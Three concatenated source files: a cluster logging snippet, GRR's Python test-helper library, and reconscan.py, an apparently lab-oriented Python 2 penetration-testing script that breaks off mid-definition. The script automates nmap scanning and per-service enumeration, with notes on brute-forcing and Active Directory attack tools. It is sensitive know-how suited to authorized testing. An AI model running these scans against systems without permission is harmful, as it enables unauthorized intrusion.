len(cluster_conf.file_shares) if cluster_conf.file_shares is not None else 0)
log.info("gpu enabled: %s", str(cluster_conf.gpu_enabled()))
log.info("docker repo name: %s", cluster_conf.get_docker_repo())
if cluster_conf.get_docker_run_options():
log.info("docker run options: %s", cluster_conf.get_docker_run_options())
log.info("wait for cluster: %s", wait)
if user_configuration:
log.info("username: %s", user_configuration.username)
if user_configuration.password:
log.info("Password: %s", "*" * len(user_configuration.password))
log.info("Plugins:")
if not cluster_conf.plugins:
log.info(" None Configured")
else:
for plugin in cluster_conf.plugins:
log.info(" - %s", plugin.name)
log.info("-------------------------------------------")
def log_property(label: str, value: str):
label += ":"
log.info("{0:30} {1}".format(label, value))
def log_node_copy_output(node_output):
log.info("-" * (len(node_output.id) + 4))
log.info("| %s |", node_output.id)
log.info("-" * (len(node_output.id) + 4))
if node_output.error:
log.error(node_output.error)
else:
log.print("Copy successful")
def log_node_run_output(node_output):
log.info("-" * (len(node_output.id) + 4))
log.info("| %s |", node_output.id)
log.info("-" * (len(node_output.id) + 4))
if node_output.error:
log.error("%s\n", node_output.error)
else:
log.print(node_output.output)
|
test_lib.py
|
#!/usr/bin/env python
"""A library for tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import datetime
import doctest
import email
import functools
import itertools
import logging
import os
import shutil
import threading
import time
import unittest
from absl.testing import absltest
import mock
import pkg_resources
from grr_response_core import config
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import client_network as rdf_client_network
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_core.lib.util import cache
from grr_response_core.lib.util import compatibility
from grr_response_core.lib.util import precondition
from grr_response_core.lib.util import temp
from grr_response_core.stats import stats_collector_instance
from grr_response_server import access_control
from grr_response_server import client_index
from grr_response_server import data_store
from grr_response_server import email_alerts
from grr_response_server import prometheus_stats_collector
from grr_response_server.rdfvalues import objects as rdf_objects
from grr.test_lib import testing_startup
FIXED_TIME = rdfvalue.RDFDatetime.Now() - rdfvalue.Duration.From(
8, rdfvalue.DAYS)
TEST_CLIENT_ID = "C.1000000000000000"
class GRRBaseTest(absltest.TestCase):
"""This is the base class for all GRR tests."""
def __init__(self, methodName=None): # pylint: disable=g-bad-name
"""Hack around unittest's stupid constructor.
We sometimes need to instantiate the test suite without running any tests -
    e.g. to start initialization or setUp() functions. The unittest constructor
    requires a valid method name to be provided.
Args:
methodName: The test method to run.
"""
super(GRRBaseTest, self).__init__(methodName=methodName or "__init__")
self.base_path = config.CONFIG["Test.data_dir"]
def setUp(self):
super(GRRBaseTest, self).setUp()
test_user = u"test"
system_users_patcher = mock.patch.object(
access_control, "SYSTEM_USERS",
frozenset(itertools.chain(access_control.SYSTEM_USERS, [test_user])))
system_users_patcher.start()
self.addCleanup(system_users_patcher.stop)
self.token = access_control.ACLToken(
username=test_user, reason="Running tests")
self.temp_dir = temp.TempDirPath()
config.CONFIG.SetWriteBack(os.path.join(self.temp_dir, "writeback.yaml"))
self.addCleanup(lambda: shutil.rmtree(self.temp_dir, ignore_errors=True))
# Each datastore is wrapped with DatabaseValidationWrapper, so we have
# to access the delegate directly (assuming it's an InMemoryDB
# implementation).
data_store.REL_DB.delegate.ClearTestDB()
email_alerts.InitializeEmailAlerterOnce()
# Stub out the email function
self.emails_sent = []
def SendEmailStub(to_user, from_user, subject, message, **unused_kwargs):
self.emails_sent.append((to_user, from_user, subject, message))
self.mail_stubber = utils.MultiStubber(
(email_alerts.EMAIL_ALERTER, "SendEmail", SendEmailStub),
(email.utils, "make_msgid", lambda: "<message id stub>"))
self.mail_stubber.Start()
self.addCleanup(self.mail_stubber.Stop)
# We don't want to send actual email in our tests
self.smtp_patcher = mock.patch("smtplib.SMTP")
self.mock_smtp = self.smtp_patcher.start()
self.addCleanup(self.smtp_patcher.stop)
def DisabledSet(*unused_args, **unused_kw):
raise NotImplementedError(
"Usage of Set() is disabled, please use a configoverrider in tests.")
self.config_set_disable = utils.Stubber(config.CONFIG, "Set", DisabledSet)
self.config_set_disable.Start()
self.addCleanup(self.config_set_disable.Stop)
self._SetupFakeStatsContext()
# Turn off WithLimitedCallFrequency-based caching in tests. Tests that need
# to test caching behavior explicitly, should turn it on explicitly.
with_limited_call_frequency_stubber = utils.Stubber(
cache, "WITH_LIMITED_CALL_FREQUENCY_PASS_THROUGH", True)
with_limited_call_frequency_stubber.Start()
self.addCleanup(with_limited_call_frequency_stubber.Stop)
def _SetupFakeStatsContext(self):
"""Creates a stats context for running tests based on defined metrics."""
# Reset stats_collector_instance to None, then reinitialize it.
patcher = mock.patch.object(stats_collector_instance, "_stats_singleton",
None)
patcher.start()
self.addCleanup(patcher.stop)
stats_collector_instance.Set(
prometheus_stats_collector.PrometheusStatsCollector())
def SetupClient(self,
client_nr,
arch="x86_64",
fqdn=None,
labels=None,
last_boot_time=None,
install_time=None,
kernel="4.0.0",
os_version="buster/sid",
ping=None,
system="Linux",
users=None,
memory_size=None,
add_cert=True,
fleetspeak_enabled=False):
"""Prepares a test client mock to be used.
Args:
client_nr: int The GRR ID to be used. 0xABCD maps to C.100000000000abcd in
canonical representation.
arch: string
fqdn: string
labels: list of labels (strings)
last_boot_time: RDFDatetime
install_time: RDFDatetime
kernel: string
os_version: string
ping: RDFDatetime
system: string
users: list of rdf_client.User objects.
memory_size: bytes
add_cert: boolean
fleetspeak_enabled: boolean
Returns:
the client_id: string
"""
client = self._SetupTestClientObject(
client_nr,
add_cert=add_cert,
arch=arch,
fqdn=fqdn,
install_time=install_time,
labels=labels,
last_boot_time=last_boot_time,
kernel=kernel,
memory_size=memory_size,
os_version=os_version,
ping=ping or rdfvalue.RDFDatetime.Now(),
system=system,
users=users,
fleetspeak_enabled=fleetspeak_enabled)
return client.client_id
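  # Hedged usage sketch (illustrative only): inside a GRRBaseTest-derived test,
  # 0xABCD yields the canonical id described in the docstring above.
  #
  #   client_id = self.SetupClient(0xABCD, system="Linux")
  #   # client_id == "C.100000000000abcd"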
def SetupClients(self, nr_clients, *args, **kwargs):
"""Prepares nr_clients test client mocks to be used."""
return self.SetupClientsWithIndices(range(nr_clients), *args, **kwargs)
def SetupClientsWithIndices(self, indices, *args, **kwargs):
"""Sets up mock clients, one for each numerical index in 'indices'."""
return [self.SetupClient(i, *args, **kwargs) for i in indices]
def _TestClientInfo(self, labels=None):
res = rdf_client.ClientInformation(
client_name="GRR Monitor",
client_version=config.CONFIG["Source.version_numeric"],
build_time="1980-01-01")
if labels is None:
res.labels = ["label1", "label2"]
else:
res.labels = labels
return res
def _TestInterfaces(self, client_nr):
ip1 = rdf_client_network.NetworkAddress()
ip1.human_readable_address = "192.168.0.%d" % client_nr
ip2 = rdf_client_network.NetworkAddress()
ip2.human_readable_address = "2001:abcd::%x" % client_nr
    mac1 = rdf_client_network.MacAddress.FromHumanReadableAddress(
        "aabbccddee%02x" % client_nr)
mac2 = rdf_client_network.MacAddress.FromHumanReadableAddress(
"bbccddeeff%02x" % client_nr)
return [
rdf_client_network.Interface(ifname="if0", addresses=[ip1, ip2]),
rdf_client_network.Interface(ifname="if1", mac_address=mac1),
rdf_client_network.Interface(ifname="if2", mac_address=mac2),
]
def _SetupTestClientObject(self,
client_nr,
add_cert=True,
arch="x86_64",
fqdn=None,
install_time=None,
last_boot_time=None,
kernel="4.0.0",
memory_size=None,
os_version="buster/sid",
ping=None,
system="Linux",
users=None,
labels=None,
fleetspeak_enabled=False):
"""Prepares a test client object."""
client_id = u"C.1%015x" % client_nr
client = rdf_objects.ClientSnapshot(client_id=client_id)
client.startup_info.client_info = self._TestClientInfo(labels=labels)
if last_boot_time is not None:
client.startup_info.boot_time = last_boot_time
client.knowledge_base.fqdn = fqdn or "Host-%x.example.com" % client_nr
client.knowledge_base.os = system
client.knowledge_base.users = users or [
rdf_client.User(username=u"user1"),
rdf_client.User(username=u"user2"),
]
client.os_version = os_version
client.arch = arch
client.kernel = kernel
client.interfaces = self._TestInterfaces(client_nr)
client.install_time = install_time
client.hardware_info = rdf_client.HardwareInfo(
system_manufacturer="System-Manufacturer-%x" % client_nr,
bios_version="Bios-Version-%x" % client_nr)
if memory_size is not None:
client.memory_size = memory_size
ping = ping or rdfvalue.RDFDatetime.Now()
if add_cert:
cert = self.ClientCertFromPrivateKey(config.CONFIG["Client.private_key"])
else:
cert = None
data_store.REL_DB.WriteClientMetadata(
client_id,
last_ping=ping,
certificate=cert,
fleetspeak_enabled=fleetspeak_enabled)
data_store.REL_DB.WriteClientSnapshot(client)
client_index.ClientIndex().AddClient(client)
if labels is not None:
data_store.REL_DB.AddClientLabels(client_id, u"GRR", labels)
client_index.ClientIndex().AddClientLabels(client_id, labels)
return client
def AddClientLabel(self, client_id, owner, name):
data_store.REL_DB.AddClientLabels(client_id, owner, [name])
client_index.ClientIndex().AddClientLabels(client_id, [name])
def ClientCertFromPrivateKey(self, private_key):
common_name = rdf_client.ClientURN.FromPrivateKey(private_key)
csr = rdf_crypto.CertificateSigningRequest(
common_name=common_name, private_key=private_key)
return rdf_crypto.RDFX509Cert.ClientCertFromCSR(csr)
def GenerateToken(self, username, reason):
return access_control.ACLToken(username=username, reason=reason)
class ConfigOverrider(object):
"""A context to temporarily change config options."""
def __init__(self, overrides):
self._overrides = overrides
self._old_cache = None
self._old_global_override = None
def __enter__(self):
self.Start()
def Start(self):
self._old_cache = config.CONFIG.cache
config.CONFIG.cache = dict()
self._old_global_override = config.CONFIG.global_override
config.CONFIG.global_override = self._old_global_override.copy()
config.CONFIG.global_override.update(self._overrides)
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Stop()
def Stop(self):
config.CONFIG.cache = self._old_cache
config.CONFIG.global_override = self._old_global_override
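# Hedged usage sketch (the option name is an illustrative assumption): override
# a config value for the duration of a block.
#
#   with ConfigOverrider({"Client.poll_max": 1}):
#     ...  # code under test sees the overridden value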
class PreserveConfig(object):
def __enter__(self):
self.Start()
def Start(self):
self.old_config = config.CONFIG
config.CONFIG = self.old_config.MakeNewConfig()
config.CONFIG.initialized = self.old_config.initialized
config.CONFIG.SetWriteBack(self.old_config.writeback.filename)
config.CONFIG.raw_data = self.old_config.raw_data.copy()
config.CONFIG.writeback_data = self.old_config.writeback_data.copy()
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Stop()
def Stop(self):
config.CONFIG = self.old_config
class FakeTime(object):
"""A context manager for faking time."""
def __init__(self, fake_time, increment=0):
if isinstance(fake_time, rdfvalue.RDFDatetime):
self.time = fake_time.AsMicrosecondsSinceEpoch() / 1e6
elif isinstance(fake_time, str):
self.time = rdfvalue.RDFDatetime.FromHumanReadable(
fake_time).AsMicrosecondsSinceEpoch() / 1e6
else:
self.time = fake_time
self.increment = increment
def __enter__(self):
self.old_time = time.time
def Time():
self.time += self.increment
return self.time
time.time = Time
self.old_strftime = time.strftime
def Strftime(form, t=time.localtime(Time())):
return self.old_strftime(form, t)
time.strftime = Strftime
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
time.time = self.old_time
time.strftime = self.old_strftime
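# Hedged usage sketch (illustrative only): freeze time.time() inside a test.
#
#   with FakeTime(100):
#     assert time.time() == 100
#   with FakeTime(rdfvalue.RDFDatetime.FromHumanReadable("2019-01-01")):
#     ...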
# TODO(hanuszczak): `FakeTime` and `FakeTimeline` serve a similar purpose,
# although `FakeTimeline` (arguably) allows to write more sophisticated tests.
# Therefore, it should be possible to rewrite existing test code to use
# `FakeTimeline` instead of `FakeTime`. Once done, `FakeTime` should be removed.
# TODO(hanuszczak): Write proper documentation.
class FakeTimeline(object):
"""A context manager for testing time-aware code.
This utility class overrides `time.sleep` and `time.time` methods so that the
code that uses them can be tested. It is assumed that the code that needs to
be tested runs on some thread. Using `Run` method one can simulate running
this thread for certain amount of time but without spending that time waiting
for anything.
While internally the simulation actually executes the code on a separate
thread, it can be thought as if the code was executed synchronously on the
current thread. However, the time flow is "immediate" and `time.sleep` calls
do not really block.
  For example, it is possible to instantly simulate running a thread for half
  an hour (assuming that the thread would spend most of that time sleeping).
In order to reliably test flow of time-aware code, it is assumed that only the
`time.sleep` function causes the time flow. In other words, every non-`sleep`
line of code is assumed to be executed instantly. In particular, if there is
  an infinite loop without any `time.sleep` calls, then running the simulation
for any number of seconds will block indefinitely. This is not a big issue
since this class is intended to be used only for testing purposes.
"""
class _WorkerThreadExit(Exception): # pylint: disable=g-bad-exception-name
pass
def __init__(self, thread, now=None):
"""Initializes the timeline.
Args:
thread: A thread to perform controlled execution on.
now: An `RDFDatetime` object representing starting point of the timeline.
If no value is provided, current time is used.
Raises:
TypeError: If `thread` is not an instance of `Thread` or if `now` is not
an instance of `RDFDatetime`.
"""
if not isinstance(thread, threading.Thread):
raise TypeError("`thread` is not an instance of `threading.Thread`")
if now is not None and not isinstance(now, rdfvalue.RDFDatetime):
raise TypeError("`now` is not an instance of `rdfvalue.RDFDatetime`")
self._thread = thread
self._owner_thread_turn = threading.Event()
self._worker_thread_turn = threading.Event()
# Fake, "current" number of seconds since epoch.
self._time = (now or rdfvalue.RDFDatetime.Now()).AsSecondsSinceEpoch()
# Number of seconds that the worker thread can sleep.
self._budget = 0
self._worker_thread = None
self._worker_thread_done = False
self._worker_thread_exception = None
def Run(self, duration):
"""Simulated running the underlying thread for the specified duration.
Args:
duration: A `Duration` object describing for how long simulate the thread.
Raises:
TypeError: If `duration` is not an instance of `rdfvalue.Duration`.
AssertionError: If this method is called without the context being initialized
(i.e. outside of a `with` block).
"""
precondition.AssertType(duration, rdfvalue.Duration)
if self._worker_thread is None:
raise AssertionError("Worker thread hasn't been started (method was "
"probably called without context initialization)")
if self._worker_thread_done:
return
self._budget += duration.ToInt(rdfvalue.SECONDS)
self._original_time = time.time
self._original_sleep = time.sleep
with utils.Stubber(time, "time", self._Time),\
utils.Stubber(time, "sleep", self._Sleep):
self._owner_thread_turn.clear()
self._worker_thread_turn.set()
self._owner_thread_turn.wait()
if self._worker_thread_exception is not None:
# TODO(hanuszczak): Investigate why this linter warning is triggered.
raise self._worker_thread_exception # pylint: disable=raising-bad-type
def __enter__(self):
if self._worker_thread is not None:
raise AssertionError("Worker thread has already been started, context "
"cannot be reused.")
def Worker():
self._worker_thread_turn.wait()
try:
if self._worker_thread_done:
raise FakeTimeline._WorkerThreadExit
self._thread.run()
except FakeTimeline._WorkerThreadExit:
pass
except Exception as exception: # pylint: disable=broad-except
self._worker_thread_exception = exception
self._worker_thread_done = True
self._owner_thread_turn.set()
self._worker_thread = threading.Thread(
target=Worker, name="FakeTimelineThread")
self._worker_thread.start()
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
del exc_type, exc_value, exc_traceback # Unused.
self._worker_thread_done = True
self._worker_thread_turn.set()
self._worker_thread.join(5.0)
if self._worker_thread.is_alive():
raise RuntimeError("FakeTimelineThread did not complete.")
def _Sleep(self, seconds):
if threading.current_thread() is not self._worker_thread:
return self._original_sleep(seconds)
self._time += seconds
self._budget -= seconds
while self._budget < 0:
self._worker_thread_turn.clear()
self._owner_thread_turn.set()
self._worker_thread_turn.wait()
if self._worker_thread_done:
raise FakeTimeline._WorkerThreadExit()
def _Time(self):
if threading.current_thread() is not self._worker_thread:
return self._original_time()
return self._time
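# Illustrative usage sketch (not part of the original module): simulating a
# thread that sleeps for many minutes without actually waiting. The
# `Duration.From(value, unit)` constructor is an assumption; `rdfvalue.SECONDS`
# is the unit already used by `Run` above.
def _ExampleFakeTimelineUsage():
  def SleepyWork():
    for _ in range(10):
      time.sleep(60)  # 10 simulated minutes in total.

  timeline = FakeTimeline(threading.Thread(target=SleepyWork))
  with timeline:
    timeline.Run(rdfvalue.Duration.From(300, rdfvalue.SECONDS))  # Roughly half-way through.
    timeline.Run(rdfvalue.Duration.From(600, rdfvalue.SECONDS))  # Finishes the remaining sleeps.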
class FakeDateTimeUTC(object):
"""A context manager for faking time when using datetime.utcnow."""
def __init__(self, fake_time, increment=0):
self.time = fake_time
self.increment = increment
def __enter__(self):
self.old_datetime = datetime.datetime
class FakeDateTime(object):
def __init__(self, time_val, increment, orig_datetime):
self.time = time_val
self.increment = increment
self.orig_datetime = orig_datetime
def __call__(self, *args, **kw):
return self.orig_datetime(*args, **kw)
def __getattribute__(self, name):
try:
return object.__getattribute__(self, name)
except AttributeError:
return getattr(self.orig_datetime, name)
def utcnow(self): # pylint: disable=invalid-name
self.time += self.increment
return self.orig_datetime.utcfromtimestamp(self.time)
datetime.datetime = FakeDateTime(self.time, self.increment,
self.old_datetime)
def __exit__(self, unused_type, unused_value, unused_traceback):
datetime.datetime = self.old_datetime
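# Illustrative usage sketch (not part of the original module): `FakeDateTimeUTC`
# fakes `datetime.datetime.utcnow()` based on a seconds-since-epoch value.
def _ExampleFakeDateTimeUTCUsage():
  with FakeDateTimeUTC(1000000.0):
    return datetime.datetime.utcnow()  # 1970-01-12 13:46:40 UTC.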
class Instrument(object):
"""A helper to instrument a function call.
Stores a copy of all function call args locally for later inspection.
"""
def __init__(self, module, target_name):
self.old_target = getattr(module, target_name)
@functools.wraps(self.old_target)
def Wrapper(*args, **kwargs):
self.args.append(args)
self.kwargs.append(kwargs)
self.call_count += 1
return self.old_target(*args, **kwargs)
self.stubber = utils.Stubber(module, target_name, Wrapper)
self.args = []
self.kwargs = []
self.call_count = 0
def __enter__(self):
self.stubber.__enter__()
return self
def __exit__(self, t, value, tb):
return self.stubber.__exit__(t, value, tb)
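# Illustrative usage sketch (not part of the original module): `Instrument`
# records every call made to the wrapped function while the context is active.
# `logging.info` is used here only as a convenient target.
def _ExampleInstrumentUsage():
  with Instrument(logging, "info") as instrumented:
    logging.info("hello %s", "world")
  return instrumented.call_count, instrumented.args, instrumented.kwargs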
def RequiresPackage(package_name):
"""Skip this test if required package isn't present.
Note this will only work in opensource testing where we actually have
packages.
Args:
package_name: string
Returns:
Decorator function
"""
def Decorator(test_function):
@functools.wraps(test_function)
def Wrapper(*args, **kwargs):
try:
pkg_resources.get_distribution(package_name)
except pkg_resources.DistributionNotFound:
raise unittest.SkipTest("Skipping, package %s not installed" %
package_name)
return test_function(*args, **kwargs)
return Wrapper
return Decorator
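# Illustrative usage sketch (not part of the original module): skipping a test
# when an optional dependency is not installed. The package name is hypothetical.
class _ExampleRequiresPackageTest(absltest.TestCase):

  @RequiresPackage("some-optional-package")  # Hypothetical package name.
  def testNeedsOptionalPackage(self):
    self.assertTrue(True)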
class SuppressLogs(object):
"""A context manager for suppressing logging."""
def __enter__(self):
self.old_error = logging.error
self.old_warning = logging.warning
self.old_info = logging.info
self.old_debug = logging.debug
logging.error = lambda *args, **kw: None
logging.warning = lambda *args, **kw: None
logging.info = lambda *args, **kw: None
logging.debug = lambda *args, **kw: None
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
logging.error = self.old_error
logging.warning = self.old_warning
logging.info = self.old_info
logging.debug = self.old_debug
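# Illustrative usage sketch (not part of the original module): silencing noisy
# log output for a block of test code.
def _ExampleSuppressLogsUsage():
  with SuppressLogs():
    logging.error("This message is swallowed.")
  logging.error("This message is logged again.")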
# TODO(user): It would be nice if all doctested functions (or even examples)
# had their own method in the TestCase. This allows faster developer cycles,
# because the developer sees all failures instead of only the first one. Also,
# it makes it easier to see if a doctest has been added for a new docstring.
class DocTest(absltest.TestCase):
"""A TestCase that tests examples in docstrings using doctest.
Attributes:
module: A reference to the module to be tested.
"""
module = None
def testDocStrings(self):
"""Test all examples in docstrings using doctest."""
if not compatibility.PY2:
# TODO(user): Migrate all doctests to Python 3 only once we use Python 3
# in production.
self.skipTest("DocTest is disabled for Python 3 because of unicode string"
" formatting.")
self.assertIsNotNone(self.module, "Set DocTest.module to test docstrings.")
try:
num_failed, num_attempted = doctest.testmod(
self.module, raise_on_error=True)
except doctest.DocTestFailure as e:
name = e.test.name
if "." in name:
name = name.split(".")[-1] # Remove long module prefix.
filename = os.path.basename(e.test.filename)
self.fail("DocTestFailure in {} ({} on line {}):\n"
">>> {}Expected : {}Actual : {}".format(
name, filename, e.test.lineno, e.example.source,
e.example.want, e.got))
# Fail if DocTest is referenced, but no examples in docstrings are present.
self.assertGreater(num_attempted, 0, "No doctests were found!")
# num_failed > 0 should not happen because raise_on_error = True.
self.assertEqual(num_failed, 0, "{} doctests failed.".format(num_failed))
def main(argv=None):
del argv # Unused.
testing_startup.TestInit()
absltest.main()
|
reconscan.py
|
#!/usr/bin/env python
###############################################################################################################
## [Title]: reconscan.py -- a recon/enumeration script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
## [Updates]: Reward1
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed remotely against a list of IPs to enumerate discovered services such
## as smb, smtp, snmp, ftp and others.
##
## This script really likes it when you put a targets.txt file containing targets (one per line) at
## /root/scripts/recon_enum/results/exam/targets.txt (an example format is shown at the end of this header)
##
## The script first runs a fast nmap scan (high --min-rate) against all TCP/UDP ports, passes each open port to a
## per-port nmap version/script scan that dispatches the matching service recon script, and finally kicks off a
## slower full nmap scan against all ports.
##-------------------------------------------------------------------------------------------------------------
## [Run]:
## Execute setup.sh in the scripts folder
## /root/scripts/recon_enum/./reconscan.py
## or
## python /root/scripts/recon_enum/reconscan.py
##-------------------------------------------------------------------------------------------------------------
## [Warning]:
## This script comes as-is with no promise of functionality or accuracy. I strictly wrote it for personal use
## I have no plans to maintain updates, I did not write it to be efficient and in some cases you may find the
## functions may not produce the desired results so use at your own risk/discretion. I wrote this script to
## target machines in a lab environment so please only use it against systems for which you have permission!!
##-------------------------------------------------------------------------------------------------------------
## [Modification, Distribution, and Attribution]:
## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
## worth anything anyway :)
##-------------------------------------------------------------------------------------------------------------
## [TODO]
## Expand: "Alive" script. Identify alive hosts using 'advanced' techniques.
## Pre-Exploitation Enumeration > Active > Internal Infrastructure Mapping > Identify Alive IPs
## Expand: RDPenum with rdp-sec-check
## Running each script individually does not ensure their output directory paths exist...QoL feature...
## Fix DNSRecon
## Expand: DirbustEverything
## : more tools! DirBuster, Dirsearch...WFUZZ still needs extensions
## : PHP Filters
## : Eyewitness: web page screenshots
## : Photon, nice crawler. Can ensure things are not missed (currently using Cewl to crawl and wordlist)
## : grab (Status: 301) pages (generalize STAT200 function) and gobust just on those
## Expand: nmapHTTPVuln
## : snallygaster https://github.com/hannob/snallygaster
## Expand FTP/TFTP: Utilize anonymous and credentialed DotDotPwn scan
## Expand SMTPrecon
## : currently only scans 25. need: 25,110,143,465,587,993,995 (IMAP/POP/Exchange)
## : Change to ip_address, port. Pass specific ports only, currently hardcoded 25,465,587
## : Ruler for exchange (possibly)
## Expand SMBRecon
## : hydra or crackmapexec for spray/brute #need to specify Domain, also worry about lockout
## Expand dirTrav:
## Need to debug all cases (page?= vulns and windows)
## Option to run reconscan with an IP range to pass to aliverecon
## Expand ReconScan:
## Other tools to consider: WHOIS, DNSRecon, Sublist3r
## Other tools to consider: WafW00f, WAFNinja, XSS Scanner, Arachni, Spaghetti, TheHarvester, Metagoofil,
## Other tools to consider: A2SV
## Separate CMSscannerrecon: WPscan, WPscanner, WPSeku, Droopescan,
## Create "AutoADPwn": Invoke several modules, AD recon, bloodhound, Empire/Deathstar
## Need scripts for:
## rsh, vnc
##
## [THOUGHTS]
## Organizing everything by IP address would probably be a lot better, but it seems like a lot of work to go through everything to make that change...
## Split http nmap scripts
##
## [NOTES]
## vulners.nse requires -sV flag
###############################################################################################################
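##-------------------------------------------------------------------------------------------------------------
## [Example targets.txt] (illustrative addition, not part of the original header):
## One target per line; lines starting with '#' are skipped by the main loop.
##   10.11.1.5
##   10.11.1.13
##   #10.11.1.99   <- commented out, will not be scanned
##-------------------------------------------------------------------------------------------------------------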
import subprocess
import multiprocessing
from multiprocessing import Process, Queue
import os
import time
import errno
import shutil
from colorama import init, Fore, Style
init()
# Fore: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
# Back: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
# Style: DIM, NORMAL, BRIGHT, RESET_ALL
#PRIVATE VARS
userAgent = "'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'" #This will replace the default nmap http agent string
FAST_NMAP_MIN_RATE = "10000"
SLOW_NMAP_MIN_RATE = "1000"
def multProc(targetin, scanip, port):
jobs = []
p = multiprocessing.Process(target=targetin, args=(scanip,port))
jobs.append(p)
p.start()
return
def jserveEnum(ip_address, port):
print Fore.GREEN + "INFO: Enumerating Apache Jserve on %s:%s" % (ip_address, port) + Style.RESET_ALL
subprocess.check_output(['auxiliary/./jserverecon.py',ip_address,port])
return
def dnsEnum(ip_address, port):
print "INFO: Enumerating DNS on %s:%s" % (ip_address, port)
if port.strip() == "53":
SCRIPT = "./dnsrecon.py %s" % (ip_address)# execute the python script
subprocess.check_output(['./dnsrecon.py',ip_address])
return
def ftpEnum(ip_address, port):
#EDIT WITH USERNAME/PASSWORD LISTS
print "INFO: Enumerating ftp on %s:%s" % (ip_address, port)
#FTPRECON in subdirectory in case ssh/telnet/mysql are present, hydra will have
#separate hydra.restore files
SCRIPT = "ftp/./ftprecon.py %s %s" % (ip_address, port)
subprocess.check_output(['ftp/./ftprecon.py',ip_address,port])
return
def fingerEnum(ip_address, port):
print "INFO: Enumerating Finger on %s:%s" % (ip_address, port)
FINGERSCAN = "nmap -n -sV -Pn -vv -p %s --script finger,vulners -oA /root/scripts/recon_enum/results/exam/finger/%s_finger.xml %s" % (port, ip_address, ip_address)
subprocess.check_output(['nmap','-n','-sV','-Pn','-vv','-p',port,'--script','finger,vulners','-oA','/root/scripts/recon_enum/results/exam/finger/%s_%s_finger' % (ip_address,port),ip_address])
return
def httpEnum(ip_address, port):
path = "/root/scripts/recon_enum/results/exam/dirb/%s" % (port)
mkdir_p(path)
print "INFO: Enumerating http on %s:%s" % (ip_address, port)
#print "INFO: Performing nmap web script scan for %s:%s" % (ip_address, port)
subprocess.check_output(['./webrecon.py','-a',userAgent,'http://%s:%s' % (ip_address, port)])
#print "INFO: webRecon scan completed for %s:%s" % (ip_address, port)
#print "INFO: dirbust scan started on %s:%s" % (ip_address, port)
subprocess.check_output(['./dirbustEVERYTHING.py','-a',userAgent,'-p','1','-i','4','http://%s:%s' % (ip_address,port)])
#print "INFO: dirbust scan completed for %s:%s" % (ip_address, port)
return
def httpsEnum(ip_address, port):
path = "/root/scripts/recon_enum/results/exam/dirb/%s" % (port)
mkdir_p(path)
print "INFO: Enumerating https on %s:%s" % (ip_address, port)
#print "INFO: Performing nmap web script scan for %s:%s" % (ip_address, port)
subprocess.check_output(['./webRecon.py','-a',userAgent,'https://%s:%s' % (ip_address, port)])
#print "INFO: webRecon scan completed for %s:%s" % (ip_address, port)
#print "INFO: dirbust scan started on %s:%s" % (ip_address, port)
subprocess.check_output(['./dirbustEVERYTHING.py','-a',userAgent,'-p','1','-i','4','https://%s:%s' % (ip_address,port)])
#print "INFO: dirbust scan completed for %s:%s" % (ip_address, port)
return
def mssqlEnum(ip_address, port):
#EDIT WITH USERNAME/PASSWORD LISTS
#MYSQLRECON in subdirectory in case multiple Hydra.restore files. default, nmap performs brute.
print "INFO: Enumerating MS-SQL on %s:%s" % (ip_address, port)
subprocess.check_output(['mssql/./mssqlrecon.py',ip_address,port])
return
def ldapEnum(ip_address, port):
print "INFO: Enumerating LDAP on %s:%s" % (ip_address, port)
subprocess.check_output(['./ldaprecon.py',ip_address,port])
return
def mysqlEnum(ip_address, port):
#EDIT WITH USERNAME/PASSWORD LISTS
#MYSQLRECON in subdirectory in case ftp/ssh/telnet are present, hydra will have
print "INFO: Enumerating MySQL on %s:%s" % (ip_address, port)
subprocess.check_output(['mysql/./mysqlrecon.py',ip_address,port])
return
def nfsEnum(ip_address, port):
print "INFO: Enumerating NFS on %s:%s" % (ip_address, port)
subprocess.check_output(['./nfsrecon.py',ip_address,port])
return
def msrpc(ip_address, port):
print "INFO: Enumerating MSRPC on %s:%s" % (ip_address, port)
#Impacket RPC packages
subprocess.check_output(['./msrpcrecon.py',ip_address,port])
return
#port 111 (rpcbind/portmapper); requires nfs-common (apt-get install nfs-common)
#Running
#rpc-grind: Fingerprints target RPC port to extract service, rpc number, and version
#rpcinfo: Connects to portmapper and fetches a list of all registered programs
#Not Running
#rpcap-brute: Brute against WinPcap Remote Capture
#rpcap-info: Retrieve interface information through rpcap service
def rpcbindEnum(ip_address, port):
print "INFO: Enumerating RPCBind on %s:%s" % (ip_address, port)
subprocess.check_output(['nmap','-n','-sV','-Pn','-vv','-p',port,'--script','rpc-grind,rpcinfo','-oA',"/root/scripts/recon_enum/results/exam/rpc/%s_%s_rpc" % (ip_address,port),ip_address])
RPCINFOSCAN1 = "rpcinfo %s > /root/scripts/recon_enum/results/exam/rpc/%s_rpcinfo.txt && echo -e '\n' >> /root/scripts/recon_enum/results/exam/rpc/%s_rpcinfo.txt" % (ip_address, ip_address, ip_address)
subprocess.check_output(RPCINFOSCAN1, shell=True)
RPCINFOSCAN2 = "rpcinfo -p %s > /root/scripts/recon_enum/results/exam/rpc/%s_rpcinfo.txt && echo -e '\n' >> /root/scripts/recon_enum/results/exam/rpc/%s_rpcinfo.txt" % (ip_address, ip_address, ip_address)
subprocess.check_output(RPCINFOSCAN2, shell=True)
RPCINFOSCAN3 = "rpcinfo -m %s > /root/scripts/recon_enum/results/exam/rpc/%s_rpcinfo.txt && echo -e '\n' >> /root/scripts/recon_enum/results/exam/rpc/%s_rpcinfo.txt" % (ip_address, ip_address, ip_address)
subprocess.check_output(RPCINFOSCAN3, shell=True)
return
def rdpEnum(ip_address, port):
